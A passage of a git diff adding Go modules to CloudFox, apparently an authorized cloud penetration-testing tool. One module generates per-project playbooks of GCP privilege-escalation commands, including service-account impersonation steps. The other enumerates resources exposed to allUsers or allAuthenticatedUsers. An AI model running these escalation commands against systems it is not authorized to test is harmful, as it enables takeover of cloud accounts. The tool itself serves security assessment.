Confidence: %s", f.BestPathConfidence) + } + sb.WriteString(fmt.Sprintf("# Shortest path: %d hops | Viable paths: %d%s\n", f.ShortestPathHops, f.ViablePathCount, confidenceNote)) + if f.ScopeBlockedCount > 0 { + sb.WriteString(fmt.Sprintf("# WARNING: %d paths blocked by OAuth scopes\n", f.ScopeBlockedCount)) + } + sb.WriteString("\n") + + // Show the best path with actual commands + if len(f.Paths) > 0 { + // Only show the best (first) path with commands + path := f.Paths[0] + + if path.ScopeBlocked { + sb.WriteString("# NOTE: This path may be blocked by OAuth scope restrictions\n\n") + } + + // If source is a service account, add impersonation + if strings.Contains(f.MemberType, "serviceAccount") || strings.Contains(f.Principal, ".iam.gserviceaccount.com") { + sb.WriteString(fmt.Sprintf("# Step 0: Impersonate the source service account\ngcloud config set auth/impersonate_service_account %s\n\n", f.Principal)) + } + + // Generate commands for each edge in the path + currentPrincipal := f.Principal + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + + // Use full reason if available, otherwise short reason + displayReason := edge.Reason + if displayReason == "" { + displayReason = edge.ShortReason + } + + sb.WriteString(fmt.Sprintf("# Step %d: %s%s\n", i+1, displayReason, annotations)) + + // Get the exploit command for this technique (pass both short and full reason) + cmd := getPrivescExploitCommand(edge.ShortReason, edge.Reason, currentPrincipal, edge.Destination, sourceProject) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + currentPrincipal = edge.Destination + } + + // Final note about admin access + targetAdmin := path.Destination + if strings.HasPrefix(targetAdmin, "serviceAccount:") { + targetAdmin = strings.TrimPrefix(targetAdmin, "serviceAccount:") + } + sb.WriteString(fmt.Sprintf("# Result: Now have %s admin access via %s\n", path.AdminLevel, targetAdmin)) + } + + sb.WriteString("\n# -----------------------------------------------------------------------------\n\n") +} + +func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PrivescModule) getHeader() []string { + return []string{ + "Project", + "Principal Type", + "Principal", + "Is Admin", + "Admin Level", + "Privesc To", + "Privesc Admin Level", + "Hops", + "Confidence", + "Permission", + } +} + +func (m *PrivescModule) findingsToTableBody() [][]string { + var body [][]string + for _, f := range m.Findings { + // Extract project from principal + project := extractProjectFromPrincipal(f.Principal, m.OrgCache) + if project == "" { + project = "-" + } + + isAdmin := "No" + if f.IsAdmin { + isAdmin = "Yes" + } + + adminLevel := f.HighestAdminLevel + if adminLevel == "" { + adminLevel = "-" + } + + // Privesc target + privescTo := "-" + privescAdminLevel := "-" + hops := "-" + confidence := "-" + permission := "-" + + if f.CanEscalate && len(f.Paths) > 0 { + // Get the best path info + bestPath := f.Paths[0] + privescTo = bestPath.Destination + // Clean up display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + hops = fmt.Sprintf("%d", bestPath.HopCount) + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Get the permission from the first edge - prefer Reason over ShortReason + if len(bestPath.Edges) > 0 { + permission = extractPermissionFromEdge(bestPath.Edges[0]) + } + + // Format privesc admin level + // Try to get more info from the FoxMapper cache if available + var destNode *foxmapperservice.Node + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + destNode = m.FoxMapperCache.GetService().GetNode(bestPath.Destination) + } + + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + privescAdminLevel = bestPath.AdminLevel + } + } + + body = append(body, []string{ + project, + f.MemberType, + f.Principal, + isAdmin, + adminLevel, + privescTo, + privescAdminLevel, + hops, + confidence, + permission, + }) + } + return body +} + +// extractPermissionFromEdge extracts a clean permission string from an edge +func extractPermissionFromEdge(edge foxmapperservice.Edge) string { + reason := edge.Reason + if reason == "" { + reason = edge.ShortReason + } + + // Try to extract actual IAM permission patterns + reasonLower := strings.ToLower(reason) + + // Common permission patterns + switch { + case strings.Contains(reasonLower, "serviceaccounts.getaccesstoken") || strings.Contains(reasonLower, "getaccesstoken"): + return "iam.serviceAccounts.getAccessToken" + case strings.Contains(reasonLower, "serviceaccountkeys.create") || strings.Contains(reasonLower, "keys.create"): + return "iam.serviceAccountKeys.create" + case strings.Contains(reasonLower, "serviceaccounts.actas") || strings.Contains(reasonLower, "actas"): + return "iam.serviceAccounts.actAs" + case strings.Contains(reasonLower, "serviceaccounts.signblob") || strings.Contains(reasonLower, "signblob"): + return "iam.serviceAccounts.signBlob" + case strings.Contains(reasonLower, "serviceaccounts.signjwt") || strings.Contains(reasonLower, "signjwt"): + return "iam.serviceAccounts.signJwt" + case strings.Contains(reasonLower, "serviceaccounts.generateidtoken") || strings.Contains(reasonLower, "generateidtoken"): + return "iam.serviceAccounts.generateIdToken" + case strings.Contains(reasonLower, "getopenidtoken") || strings.Contains(reasonLower, "openidtoken") || + strings.Contains(reasonLower, "oidc token"): + return "iam.serviceAccounts.getOpenIdToken" + case strings.Contains(reasonLower, "tokencreator"): + return "roles/iam.serviceAccountTokenCreator" + case strings.Contains(reasonLower, "serviceaccountuser"): + return "roles/iam.serviceAccountUser" + case strings.Contains(reasonLower, "workload identity") || strings.Contains(reasonLower, "workloadidentity"): + return "Workload Identity binding" + case strings.Contains(reasonLower, "setiampolicy"): + return "*.setIamPolicy" + case strings.Contains(reasonLower, "compute.instances.create"): + return "compute.instances.create" + case strings.Contains(reasonLower, "cloudfunctions.functions.create"): + return "cloudfunctions.functions.create" + case strings.Contains(reasonLower, "run.services.create"): + return "run.services.create" + case strings.Contains(reasonLower, "owner"): + return "roles/owner" + case strings.Contains(reasonLower, "editor"): + return "roles/editor" + } + + // If we have a short reason that looks like a permission, use it + if edge.ShortReason != "" && edge.ShortReason != "IAM" { + return edge.ShortReason + } + + // Default to the reason if nothing else matches + return reason +} + +// extractProjectFromPrincipal extracts project ID from a service account email. +// If orgCache is provided, it resolves project numbers to IDs. +// e.g., "sa@my-project.iam.gserviceaccount.com" -> "my-project" +func extractProjectFromPrincipal(principal string, orgCache ...*gcpinternal.OrgCache) string { + var cache *gcpinternal.OrgCache + if len(orgCache) > 0 { + cache = orgCache[0] + } + + // Helper to resolve a project number to ID via OrgCache + resolveNumber := func(number string) string { + if cache != nil && cache.IsPopulated() { + if resolved := cache.GetProjectIDByNumber(number); resolved != "" { + return resolved + } + } + return "" + } + + parts := strings.Split(principal, "@") + if len(parts) != 2 { + return "" + } + prefix := parts[0] + domain := parts[1] + + // Pattern: name@project-id.iam.gserviceaccount.com (regular SAs) + // But NOT gcp-sa-* domains (those are Google service agents with project numbers) + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") && !strings.HasPrefix(domain, "gcp-sa-") { + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + number := prefix + if strings.HasPrefix(prefix, "service-") { + number = strings.TrimPrefix(prefix, "service-") + } + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + number := prefix[:idx] + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + return "" +} + +// findingsForProject returns findings filtered for a specific project +// Includes: SAs from that project + users/groups (which apply to all projects) +func (m *PrivescModule) findingsForProject(projectID string) []foxmapperservice.PrivescFinding { + var filtered []foxmapperservice.PrivescFinding + for _, f := range m.Findings { + principalProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject == projectID || principalProject == "" { + filtered = append(filtered, f) + } + } + return filtered +} + +// findingsToTableBodyForProject returns table body for a specific project's findings +func (m *PrivescModule) findingsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, f := range m.Findings { + principalProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject != projectID && principalProject != "" { + continue + } + + // For display, show the principal's project or "-" for users/groups + displayProject := principalProject + if displayProject == "" { + displayProject = "-" + } + + isAdmin := "No" + if f.IsAdmin { + isAdmin = "Yes" + } + + adminLevel := f.HighestAdminLevel + if adminLevel == "" { + adminLevel = "-" + } + + // Privesc target + privescTo := "-" + privescAdminLevel := "-" + hops := "-" + confidence := "-" + permission := "-" + + if f.CanEscalate && len(f.Paths) > 0 { + bestPath := f.Paths[0] + privescTo = bestPath.Destination + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + hops = fmt.Sprintf("%d", bestPath.HopCount) + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Get the permission from the first edge + if len(bestPath.Edges) > 0 { + permission = extractPermissionFromEdge(bestPath.Edges[0]) + } + + // Format privesc admin level + var destNode *foxmapperservice.Node + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + destNode = m.FoxMapperCache.GetService().GetNode(bestPath.Destination) + } + + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + privescAdminLevel = bestPath.AdminLevel + } + } + + body = append(body, []string{ + displayProject, + f.MemberType, + f.Principal, + isAdmin, + adminLevel, + privescTo, + privescAdminLevel, + hops, + confidence, + permission, + }) + } + return body +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *PrivescModule) generatePlaybookForProject(projectID string) *internal.LootFile { + findings := m.findingsForProject(projectID) + if len(findings) == 0 { + return nil + } + + var sb strings.Builder + sb.WriteString("# GCP Privilege Escalation Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox using FoxMapper graph data\n\n") + + // Group findings by admin level reachable + var orgPaths, folderPaths, projectPaths []foxmapperservice.PrivescFinding + + for _, f := range findings { + if f.IsAdmin || !f.CanEscalate { + continue + } + switch f.HighestAdminLevel { + case "org": + orgPaths = append(orgPaths, f) + case "folder": + folderPaths = append(folderPaths, f) + case "project": + projectPaths = append(projectPaths, f) + } + } + + if len(orgPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# CRITICAL: Organization Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range orgPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + if len(folderPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# HIGH: Folder Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range folderPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + if len(projectPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# MEDIUM: Project Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range projectPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + contents := sb.String() + // Check if empty (just header) + headerOnly := fmt.Sprintf("# GCP Privilege Escalation Commands\n# Project: %s\n# Generated by CloudFox using FoxMapper graph data\n\n", projectID) + if contents == headerOnly { + return nil + } + + return &internal.LootFile{ + Name: "privesc-commands", + Contents: contents, + } +} + +func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project + for _, projectID := range m.ProjectIDs { + var tableFiles []internal.TableFile + + // Build table for this project + body := m.findingsToTableBodyForProject(projectID) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "privesc-permissions", + Header: m.getHeader(), + Body: body, + }) + } + + // Generate loot file for this project + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + lootFiles = append(lootFiles, *playbook) + } + + // Always add project to output (even if empty) + outputData.ProjectLevelData[projectID] = PrivescOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } +} + +func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Build table with all findings + if len(m.Findings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "privesc-permissions", + Header: m.getHeader(), + Body: m.findingsToTableBody(), + }) + } + + // Generate per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + // Rename to include project for flat output + playbook.Name = fmt.Sprintf("privesc-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := PrivescOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } +} diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go new file mode 100644 index 00000000..37d92a26 --- /dev/null +++ b/gcp/commands/publicaccess.go @@ -0,0 +1,1303 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + artifactregistry "google.golang.org/api/artifactregistry/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" + compute "google.golang.org/api/compute/v1" + dataflow "google.golang.org/api/dataflow/v1b3" + dataproc "google.golang.org/api/dataproc/v1" + notebooks "google.golang.org/api/notebooks/v1" + run "google.golang.org/api/run/v2" + secretmanager "google.golang.org/api/secretmanager/v1" + sourcerepo "google.golang.org/api/sourcerepo/v1" + storage "google.golang.org/api/storage/v1" +) + +var GCPPublicAccessCommand = &cobra.Command{ + Use: globals.GCP_PUBLICACCESS_MODULE_NAME, + Aliases: []string{"public", "allUsers", "public-resources"}, + Short: "Find resources with allUsers or allAuthenticatedUsers access", + Long: `Enumerate ALL GCP resources that have public access via allUsers or allAuthenticatedUsers. + +This module checks IAM policies on resources across all supported GCP services to identify +resources that are publicly accessible to anyone on the internet. + +Services Checked (16 total): +- Cloud Storage buckets +- BigQuery datasets and tables +- Compute Engine snapshots and images +- Cloud Run services +- Cloud Functions (v2) +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Artifact Registry repositories +- Cloud KMS crypto keys +- Cloud Spanner instances and databases +- Dataflow jobs +- Dataproc clusters +- Vertex AI Workbench notebooks +- Cloud Source Repositories + +Access Levels: +- allUsers: Anyone on the internet (no authentication required) +- allAuthenticatedUsers: Anyone with a Google account (authenticated) + +Both levels are considered "public" as allAuthenticatedUsers includes ANY Google account, +not just accounts in your organization.`, + Run: runGCPPublicAccessCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type PublicResource struct { + ResourceType string // Service type (Storage, BigQuery, etc.) + ResourceName string // Resource identifier + ProjectID string // Project containing the resource + Location string // Region/zone if applicable + AccessLevel string // allUsers or allAuthenticatedUsers + Role string // IAM role granted publicly + Size string // Size if applicable + AdditionalInfo string // Extra context +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PublicAccessModule struct { + gcpinternal.BaseGCPModule + + ProjectPublicResources map[string][]PublicResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PublicAccessOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PublicAccessOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PublicAccessOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPublicAccessCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBLICACCESS_MODULE_NAME) + if err != nil { + return + } + + module := &PublicAccessModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPublicResources: make(map[string][]PublicResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PublicAccessModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating public resources (allUsers/allAuthenticatedUsers)...", globals.GCP_PUBLICACCESS_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBLICACCESS_MODULE_NAME, m.processProject) + + allResources := m.getAllPublicResources() + if len(allResources) == 0 { + logger.InfoM("No public resources found", globals.GCP_PUBLICACCESS_MODULE_NAME) + return + } + + // Count by access level + allUsersCount := 0 + allAuthCount := 0 + for _, r := range allResources { + if r.AccessLevel == "allUsers" { + allUsersCount++ + } else { + allAuthCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d public resource(s): %d allUsers, %d allAuthenticatedUsers", + len(allResources), allUsersCount, allAuthCount), globals.GCP_PUBLICACCESS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PublicAccessModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking public access in project: %s", projectID), globals.GCP_PUBLICACCESS_MODULE_NAME) + } + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["public-access-commands"] = &internal.LootFile{ + Name: "public-access-commands", + Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.mu.Unlock() + + // Check all services in parallel + var wg sync.WaitGroup + + // 1. Cloud Storage buckets + wg.Add(1) + go func() { + defer wg.Done() + m.checkStorageBuckets(ctx, projectID, logger) + }() + + // 2. Compute Engine snapshots + wg.Add(1) + go func() { + defer wg.Done() + m.checkComputeSnapshots(ctx, projectID, logger) + }() + + // 3. Compute Engine images + wg.Add(1) + go func() { + defer wg.Done() + m.checkComputeImages(ctx, projectID, logger) + }() + + // 4. BigQuery datasets + wg.Add(1) + go func() { + defer wg.Done() + m.checkBigQueryDatasets(ctx, projectID, logger) + }() + + // 5. Cloud Run services + wg.Add(1) + go func() { + defer wg.Done() + m.checkCloudRunServices(ctx, projectID, logger) + }() + + // 6. Cloud Functions + wg.Add(1) + go func() { + defer wg.Done() + m.checkCloudFunctions(ctx, projectID, logger) + }() + + // 7. Pub/Sub topics + wg.Add(1) + go func() { + defer wg.Done() + m.checkPubSubTopics(ctx, projectID, logger) + }() + + // 8. Pub/Sub subscriptions + wg.Add(1) + go func() { + defer wg.Done() + m.checkPubSubSubscriptions(ctx, projectID, logger) + }() + + // 9. Secret Manager secrets + wg.Add(1) + go func() { + defer wg.Done() + m.checkSecretManagerSecrets(ctx, projectID, logger) + }() + + // 10. Artifact Registry repositories + wg.Add(1) + go func() { + defer wg.Done() + m.checkArtifactRegistry(ctx, projectID, logger) + }() + + // 11. Cloud KMS keys + wg.Add(1) + go func() { + defer wg.Done() + m.checkKMSKeys(ctx, projectID, logger) + }() + + // 12. Cloud Spanner instances/databases + wg.Add(1) + go func() { + defer wg.Done() + m.checkSpanner(ctx, projectID, logger) + }() + + // 13. Dataflow jobs + wg.Add(1) + go func() { + defer wg.Done() + m.checkDataflowJobs(ctx, projectID, logger) + }() + + // 14. Dataproc clusters + wg.Add(1) + go func() { + defer wg.Done() + m.checkDataprocClusters(ctx, projectID, logger) + }() + + // 15. Vertex AI Workbench (Notebooks) + wg.Add(1) + go func() { + defer wg.Done() + m.checkNotebooks(ctx, projectID, logger) + }() + + // 16. Source Repositories + wg.Add(1) + go func() { + defer wg.Done() + m.checkSourceRepos(ctx, projectID, logger) + }() + + wg.Wait() +} + +// checkStorageBuckets checks Cloud Storage buckets for public access +func (m *PublicAccessModule) checkStorageBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + return + } + + resp, err := storageService.Buckets.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) + return + } + + for _, bucket := range resp.Items { + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Cloud Storage", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Storage class: %s", bucket.StorageClass), + } + m.addResource(resource) + } + } + } + } +} + +// checkComputeSnapshots checks Compute Engine snapshots for public access +func (m *PublicAccessModule) checkComputeSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Compute Snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + AdditionalInfo: fmt.Sprintf("Source disk: %s", publicAccessExtractResourceName(snapshot.SourceDisk)), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) + } +} + +// checkComputeImages checks Compute Engine images for public access +func (m *PublicAccessModule) checkComputeImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Compute Image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + AdditionalInfo: fmt.Sprintf("Family: %s", image.Family), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) + } +} + +// checkBigQueryDatasets checks BigQuery datasets for public access +func (m *PublicAccessModule) checkBigQueryDatasets(ctx context.Context, projectID string, logger internal.Logger) { + bq := bigqueryservice.New() + datasets, err := bq.BigqueryDatasets(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list BigQuery datasets in project %s", projectID)) + return + } + + for _, dataset := range datasets { + if dataset.IsPublic { + resource := PublicResource{ + ResourceType: "BigQuery Dataset", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + Location: dataset.Location, + AccessLevel: dataset.PublicAccess, + Role: "Dataset Access", + AdditionalInfo: fmt.Sprintf("Encryption: %s", dataset.EncryptionType), + } + m.addResource(resource) + } + } + + // Also check individual tables + for _, dataset := range datasets { + tables, err := bq.BigqueryTables(projectID, dataset.DatasetID) + if err != nil { + continue + } + + for _, table := range tables { + if table.IsPublic { + resource := PublicResource{ + ResourceType: "BigQuery Table", + ResourceName: fmt.Sprintf("%s.%s", dataset.DatasetID, table.TableID), + ProjectID: projectID, + Location: table.Location, + AccessLevel: table.PublicAccess, + Role: "Table Access", + Size: publicAccessFormatBytes(table.NumBytes), + AdditionalInfo: fmt.Sprintf("Rows: %d, Type: %s", table.NumRows, table.TableType), + } + m.addResource(resource) + } + } + } +} + +// checkCloudRunServices checks Cloud Run services for public access +func (m *PublicAccessModule) checkCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + return + } + + // List all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := runService.Projects.Locations.Services.List(parent) + err = req.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + // Get IAM policy + resource := svc.Name + policy, err := runService.Projects.Locations.Services.GetIamPolicy(resource).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + serviceName := publicAccessExtractResourceName(svc.Name) + location := publicAccessExtractLocation(svc.Name) + res := PublicResource{ + ResourceType: "Cloud Run", + ResourceName: serviceName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s", svc.Uri), + } + m.addResource(res) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + } +} + +// checkCloudFunctions checks Cloud Functions for public access +func (m *PublicAccessModule) checkCloudFunctions(ctx context.Context, projectID string, logger internal.Logger) { + cfService, err := cloudfunctions.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := cfService.Projects.Locations.Functions.List(parent) + err = req.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + // Get IAM policy + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + funcName := publicAccessExtractResourceName(fn.Name) + location := publicAccessExtractLocation(fn.Name) + + // Get URL + url := "" + if fn.ServiceConfig != nil { + url = 